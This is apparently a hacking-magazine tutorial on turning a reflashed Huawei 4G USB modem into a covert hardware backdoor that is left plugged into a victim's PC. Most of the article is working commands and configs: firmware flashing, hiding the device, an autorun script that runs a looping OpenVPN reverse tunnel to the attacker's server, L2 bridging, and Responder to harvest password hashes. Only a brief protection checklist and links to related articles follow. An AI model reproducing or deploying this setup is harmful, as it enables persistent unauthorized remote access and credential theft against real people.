What if someone connects a special device to a computer left unattended, thus, gaining remote access to it from anywhere in the world? All the USB-based device emulation magic described earlier will be at the attacker’s disposal. But this time, the primary purpose of your malicious device is uninterrupted remote access, not attacks.
info
This article continues the series of publications describing practical hacking and attacking techniques involving makeshift devices that can be easily assembled at home. You will learn how to gain unauthorized access to protected information and how to protect your own data from such attacks. The previous article in this series was Evil Ethernet. BadUSB-ETH attack in detail.
Modern 4G modems (HiLink) are only slightly larger than a flash drive, and they run Linux. For instance, Android 2.3 / Linux 3.4.5 + VxWorks v6.8 for GSM. Such USB-powered devices are fully autonomous. Immediately after the connection to a PC, the modem OS is loaded (which takes a few seconds) and emulates this USB device as a network card.
The best hardware solution for the attack described in this article is a HiLink modem: it’s compact and equipped with a 4G module. For instance, the popular Huawei E3372h-153 that can be reflashed and is supported by a huge fan community.
Modern 4G modems are HiLink modems (i.e. the system identifies them as network cards). As a result, the OS running on the user’s PC conveniently interacts with the Internet via such a virtual Ethernet network. But the point is that the modem itself can be used to interact with the PC it’s plugged into. A fully functional OS runs inside this modem emulating a network card (similar to the BadUSB-ETH attack). Such a device can be used to establish a foothold on the compromised PC as shown below.
To establish a foothold in similar circumstances, you can use a ready-made device called LAN Turtle, but it lacks an important feature: support for a 4G channel that is external to the attacked system
Implementation
The device is so well suited for remote access that it requires a minimum of modifications. Its main advantages are as follows:
- no additional power is required;
- covert connection: the device won’t be visible on the local network as it operates only inside the compromised PC; and
- an autonomous 4G data transmission channel enables you to maintain access even inside isolated local networks.
For maximum efficiency, the device should be slightly modified: you have to reflash the modem. After this modification, the modem OS will automatically establish a VPN connection with the control server via the 4G network (an external channel), thus, providing stable network access to the PC the modem is plugged into. You can access the modem OS in one of the following ways:
telnet 192.168.8.1
adb connect 192.168.8.1:5555
To make further modifications, you have to enable ports for AT commands:
curl http://192.168.8.1/html/switchDebugMode.html
minicom -D /dev/ttyUSB0
After enabling the debug mode, the modem OS can be modified: you have to switch to the flash mode and flash the open firmware:
at^godload # Switch to the flash mode. The modem will restartsudo ./balong_flash -p /dev/ttyUSB0 E3372h-153_Update_22.200.15.00.00_M_AT_05.10_nv.exe
When the modem starts, it usually emulates a CD-ROM with drivers and an SD card. These functions must be disabled since the device needs only network emulation:
AT^NVWREX=50091,0,60,1 0 0 0 FF 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 A3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 # Don't switch to the CD-ROM mode at startup; RNDIS/CDC is enabledAT^RESET # RestartNext, you have to modify the DHCP server so that the modem doesn’t announce itself as a gateway, and the routing table on the PC isn’t disrupted. The modem should connect as covertly as possible:
cat <<EE > /data/configInterface br0MinLease 30Vendorid c0012Address mainEnbSrv 1Start 192.168.8.100End 192.168.8.200Option lease 86400Option subnet 255.255.255.0Address main endEENow you have to copy the OpenVPN client with the driver and config to the modem. To avoid compilation, ready-made binaries can be downloaded from the 4PDA website:
adb push tun.ko /online/ovpn/adb push openvpn /online/ovpn/adb push vds.ovpn /online/ovpn/cat <<EE > /data/vpn.sh#!/system/bin/busybox shwhile :; do /online/ovpn/openvpn --config /online/ovpn/vds.ovpn --route-noexec; doneEEchmod 700 /data/vpn.shbusybox passwdrebootTo make the reverse connection more reliable, VPN should be run in an infinite loop. Finally, you have to configure autorun for all this stuff and organize the routing of packets from the 4G network towards the target computer through the modem:
mount -o remount,rw /dev/block/mtdblock16cat <<EE >> /system/etc/autorun.sh/data/autorun.sh &EEcat <<EE > /data/autorun.sh#!/system/bin/busybox shkillall dhcps.realcp /data/config /var/dhcp/dhcps/configdhcps.real &sleep 5insmod /online/ovpn/tun.ko/data/vpn.sh &iptables -t nat -A POSTROUTING -o br0 -s 172.16.0.0/24 -j MASQUERADEiptables -I INPUT 1 -i br0 -p tcp --dport 80 -j DROPiptables -I FORWARD 2 -i br0 -o wan0 -j DROPEEchmod 700 /data/autorun.shImportant: access to the 4G Internet from the target PC must be prohibited on the modem, and the web admin panel must be hidden. Now the modified modem can be used as a hardware backdoor.
Establishing a foothold
Your hardware backdoor can look something like this.
Looks pretty innocent, doesn’t it? Just a memory stick, an ordinary user will think. If the attacker can access a USB port on the target PC, chances are high that no one notices such a ‘strange’ device for a while. This grants the attacker long-term network access to the target via an autonomous channel. Note that remote connection is implemented via an external channel, and you no longer need the internal network to access the Internet. Your mobile network channel grants you guaranteed remote access.
The smartphone and LAN Turtle are connected to the same VPN server that connects their network traffic. The 4G modem is reconfigured to pass traffic in an unusual reverse direction: through itself towards the computer (like a gateway). As a result, the attacker maintains direct network access to the compromised PC even at a distance of thousands of kilometers.
In this example, the phone and the laptop aren’t connected directly and operate in different networks. The laptop is connected to the local network via a cable without using the Internet, while the phone is connected over 4G. But when you add a route to the victim’s computer via a 4G modem, you gain remote access to this PC.
L2 access
This foothold creation technique provides network access only to the PC the modem is connected to. Further actions of the attacker require logical access (i.e. hacking the system and controlling it). In the case of success, this grants you both control over the attacked PC and the ability to advance deeper into the local network. To facilitate attacks on the target system, you may have to establish an L2VPN tunnel closer to the target.
Another VPN tunnel should be forwarded inside the existing one. The first VPN was used exclusively for communication with the lan_turtle device; while the second one will grant you the maximum possible network access to the target PC via the USB-emulated network.
To achieve this, you have to execute a few more commands inside the USB modem to create a VPN tunnel and place the newly-created virtual interface inside a network bridge with the USB interface:
./openvpn --config l2.ovpn --route-noexecbrctl addif br0 tap1ifconfig tap1 0The configuration file can be created directly inside the modem; its content should be as follows:
l2.ovpn
lclient
proto tcp
dev tap
remote 172.16.0.10 1194
<ca>
</ca>
<cert>
</cert>
<key>
</key>
keepalive 10 60
persist-key
persist-tun
The L2 VPN interface will have an IP address that’s not really needed since OpenVPN is already running. But you can discard it and then just place the interface inside the bridge. As a result, L2 packets from the compromised PC will go to the VPN interface. Not only will you get logical network access to the target PC, but you’ll see it as if you’ve plugged an Internet cable into it.
On the attacker’s side, all you need to do is connect to the modem, create a VPN tunnel, and then manually set its IP address from the network adapter subnet of the victim’s PC:
sudo openvpn --config lan_turtle.ovpn --route-noexecsudo ifconfig tap0 192.168.8.200/24
The configuration file used to connect to lan_turtle and forward an L2VPN tunnel is as follows:
lan_turtle.ovpn
local 172.16.0.10port 1194proto tcpdev tapuser nobody<ca></ca><cert></cert><key></key><dh></dh>server 192.168.9.0 255.255.255.0keepalive 10 180verb 3Now the attacker gains full network access to the victim’s computer via a 4G modem. The L2 tunnel enables you to deliver attacks targeting link-layer protocols, as well as NetBIOS, using Responder and retrieve the user’s password hash:
responder -I tap0 -r -d -w -FProtection
Since the attacker penetrates into the target PC through a USB port, the countermeasures are the same as in the case of BadUSB:
- use specialized software solutions to block untrusted USB devices;
- disable support for USB network cards in group policies;
- inspect computers on a regular basis; and
- control physical access to the PC.
Good luck!
2023.04.04 — Serpent pyramid. Run malware from the EDR blind spots!
In this article, I'll show how to modify a standalone Python interpreter so that you can load malicious dependencies directly into memory using the Pyramid…
Full article →
2023.03.03 — Infiltration and exfiltration. Data transmission techniques used in pentesting
Imagine a situation: you managed to penetrate the network perimeter and gained access to a server. This server is part of the company's internal network, and, in theory, you could…
Full article →
2022.06.03 — Vulnerable Java. Hacking Java bytecode encryption
Java code is not as simple as it seems. At first glance, hacking a Java app looks like an easy task due to a large number of available…
Full article →
2022.06.03 — Playful Xamarin. Researching and hacking a C# mobile app
Java or Kotlin are not the only languages you can use to create apps for Android. C# programmers can develop mobile apps using the Xamarin open-source…
Full article →
2022.02.09 — Dangerous developments: An overview of vulnerabilities in coding services
Development and workflow management tools represent an entire class of programs whose vulnerabilities and misconfigs can turn into a real trouble for a company using such software. For…
Full article →
2022.06.01 — First contact. Attacks on chip-based cards
Virtually all modern bank cards are equipped with a special chip that stores data required to make payments. This article discusses fraud techniques used…
Full article →
2022.06.01 — WinAFL in practice. Using fuzzer to identify security holes in software
WinAFL is a fork of the renowned AFL fuzzer developed to fuzz closed-source programs on Windows systems. All aspects of WinAFL operation are described in the official documentation,…
Full article →
2022.04.04 — Elephants and their vulnerabilities. Most epic CVEs in PostgreSQL
Once a quarter, PostgreSQL publishes minor releases containing vulnerabilities. Sometimes, such bugs make it possible to make an unprivileged user a local king superuser. To fix them,…
Full article →
2022.02.15 — EVE-NG: Building a cyberpolygon for hacking experiments
Virtualization tools are required in many situations: testing of security utilities, personnel training in attack scenarios or network infrastructure protection, etc. Some admins reinvent the wheel by…
Full article →
2022.04.04 — Fastest shot. Optimizing Blind SQL injection
Being employed with BI.ZONE, I have to exploit Blind SQL injection vulnerabilities on a regular basis. In fact, I encounter Blind-based cases even more frequently…
Full article →